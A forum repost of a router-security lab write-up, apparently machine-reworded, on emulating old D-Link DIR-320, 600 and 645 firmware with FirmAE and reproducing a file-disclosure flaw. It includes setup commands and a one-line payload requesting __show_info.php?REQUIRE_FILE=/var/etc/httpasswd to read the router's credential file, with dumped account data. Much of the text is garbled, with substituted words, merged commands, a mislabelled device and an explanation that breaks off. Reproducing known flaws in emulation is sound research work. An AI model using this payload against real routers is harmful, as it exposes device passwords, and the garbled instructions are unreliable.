12558网页游戏私服论坛

 找回密码
 立即注册
游戏开服表 申请开服
游戏名称 游戏描述 开服状态 游戏福利 运营商 游戏链接
攻城掠地-仿官 全新玩法,觉醒武将,觉醒技能 每周新区 经典复古版本,长久稳定 进入游戏
巅峰新版攻 攻城掠地公益服 攻城掠地SF 新兵种、新武将(兵种) 进入游戏
游戏盒子— 各种稀有手游私服,可以下载 各种变态版 手游交流群:117375085 进入游戏
刀剑演武 现金BOSS,不氪金也能毕业! 创角就赠送至尊8 绝版GM装备送! 进入游戏
《绝世秘籍》 每日精彩活动嗨不停 充值赠送会员 积分换极品装备 进入游戏
《百战沙城》 不肝不氪也可群殴boss 装备满屏爆 超值首充 进入游戏
全民仙战 任意首充送纯白歌宴绝版绚丽时装! 元宝福利免费领 今日新开 进入游戏
查看: 335|回复: 0

FirmAE及DlinkDIR320、600、645漏洞复现

[复制链接]
发表于 2022-1-28 22:22:15 | 显示全部楼层 |阅读模式
在学习路由器毛病与复现的过程中,购买太多硬件装备学习研究是一个成本较高的选择,那么可以选择利用现有的 FirmAE 工具,自动化的完成固件模仿工作,直接举行毛病复现
一、FirmAE

来自 FirmAE 的论文:our goal is not to build an environment identical to the physical device, but to create an environment conducive to the dynamic analysis
FirmAE 的目标是创造一个可以供用户动态调试分析的环境,而不是复现和硬件一模一样的环境
FirmAE 安装配置如下:选用 Ubuntu18.04;若 binwalk 等的软件有题目标解决方案
FirmAE:git clone --recursive https://github.com/pr0v3rbs/FirmAE./download.sh./install.shnon-standard SquashFS images:(DLink固件和SquashFS格式,很多环境不配置这个,binwalk无法精确解包)https://github.com/ReFirmLabs/binwalk/blob/master/INSTALL.md# Install sasquatch to extract non-standard SquashFS images$ sudo apt-get install zlib1g-dev liblzma-dev liblzo2-dev$ git clone https://github.com/devttys0/sasquatch$ (cd sasquatch && ./build.sh)若报错的话:/usr/bin/ld: unsquash-1.o:/home/kali/Desktop/IoT/sasquatch-master/squashfs4.3/squashfs-tools/error.h:34: multiple definition of `verbose'; unsquashfs.o:/home/kali/Desktop/IoT/sasquatch-master/squashfs4.3/squashfs-tools/error.h:34: first defined hereverbose is extern in sasquatch/squashfs4.3/squashfs-tools/error.hadd "int verbose;" in unsquashfs.c运行该命令:sudo CFLAGS=-fcommon ./build.shbinwalk:sudo apt-get install build-essential autoconf git python-lzma python-crypto libqt4-opengl python-opengl python-qt4 python-qt4-gl python-numpy python-scipy python-pipsudo apt-get install mtd-utils gzip bzip2 tar arj lhasa p7zip p7zip-full cabextract cramfsprogs cramfsswap squashfs-toolssudo pip install pyqtgraph capstone解决 No module named pkg_resources 的题目sudo apt-get install --reinstall python-pkg-resources解决 binwalk 缺少 sasquatch 的题目https://github.com/ReFirmLabs/binwalk/blob/master/INSTALL.md# Install sasquatch to extract non-standard SquashFS images$ sudo apt-get install zlib1g-dev liblzma-dev liblzo2-dev$ git clone https://github.com/devttys0/sasquatch$ (cd sasquatch && sudo CFLAGS=-fcommon ./build.sh)进入 binwalk 目录sudo python setup.py buildsudo python setup.py install发起在线安装,尝试过码云离线安装有多少题目
二、固件下载与固件提取

链接如下:
固件下载地址
已经复现的固件列表
https://ftp.dlink.ru/pub/Router/DIR-320/Firmware/old/DIR-320A1_FW121WWb03.binDIR-600FIRMWARE_DIR600B1_B2_v2.01-tomizone-1.1.0.binDIR-645DIR645A1_FW102B08.bin固件提取:
binwalk -Me *.bin对文件夹重新打包成zip,从linux下转到windows下源码审计
zip -r -q -o pack.zip test/上面命令将目录 test/ 下的全部文件,打包成一个压缩文件 pack.zip
三、毛病复现

1、DIR320

https://ftp.dlink.ru/pub/Router/DIR-320/Firmware/old/DIR-320A1_FW121WWb03.binbinwalk -Me DIR-320A1_FW121WWb03.binzip -r -q -o pack.zip squashfs-rootubuntu@ubuntu:~/Desktop/DIR600/FirmAE$ sudo ./init.sh[sudo] password for ubuntu:+ sudo service postgresql restart+ echo 'Waiting for DB to start...'Waiting for DB to start...+ sleep 5sudo ./run.sh -r dir320 ./firmwares/DIR-320A1_FW121WWb03.bin ./firmwares/DIR-320A1_FW121WWb03.bin emulation start!!!
extract done!!!
get architecture done!!!mke2fs 1.44.1 (24-Mar-2018)e2fsck 1.44.1 (24-Mar-2018)
infer network start!!![IID] 5[MODE] run[+] Network reachable on 192.168.0.1![+] Web service on 192.168.0.1Creating TAP device tap5_0...Set 'tap5_0' persistent and owned by uid 0Initializing VLAN...Bringing up TAP device...Starting emulation of firmware... 192.168.0.1 true true 5.129526057 6.385871460payload为:
localhost/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd


毛病成因:
www目录下: /model/__show_info.php 文件    DEVICE.ACCOUNT            DIR-645                    2            2            2                            USR-                admin                                adminhello                0                                                        USR-1                user                                userhello                101                                                                                0                            0                        600            128            16            
来源:http://www.12558.net
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
楼主热帖
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|12558网页游戏私服论坛 |网站地图

GMT+8, 2022-10-5 13:59 , Processed in 0.093750 second(s), 22 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表